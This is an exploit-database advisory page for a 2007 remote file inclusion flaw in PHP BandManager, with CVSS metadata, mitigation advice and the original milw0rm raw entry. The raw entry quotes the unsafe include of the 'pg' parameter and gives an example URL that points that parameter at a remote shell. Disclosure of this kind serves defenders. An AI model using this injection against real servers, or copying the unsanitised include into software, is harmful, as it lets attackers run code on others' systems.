header-logo
Suggest Exploit
vendor:
PHP BandManager
by:
koray
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: PHP BandManager
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP BandManager Remote File Inclusion Vulnerability

The PHP BandManager application is vulnerable to remote file inclusion due to the insecure use of the include function. By manipulating the 'pg' parameter in the 'index.php' file, an attacker can include arbitrary files from remote servers.

Mitigation:

To mitigate this vulnerability, it is recommended to update the PHP BandManager application to a version that addresses this issue. Additionally, disable the 'allow_url_fopen' and 'register_globals' settings in the PHP configuration.
Source

Exploit-DB raw data:

author:koray
greetz:cigicigi.net
script:http://sourceforge.net/projects/phpbandmanager

allow_url_fopen:on or register_globals:on

vuln;

/bandmanager/suite/index.php

include($_GET['pg'].".php");

example;

http://www.victim.com/suite/index.php?pg=shell link?

# milw0rm.com [2007-04-26]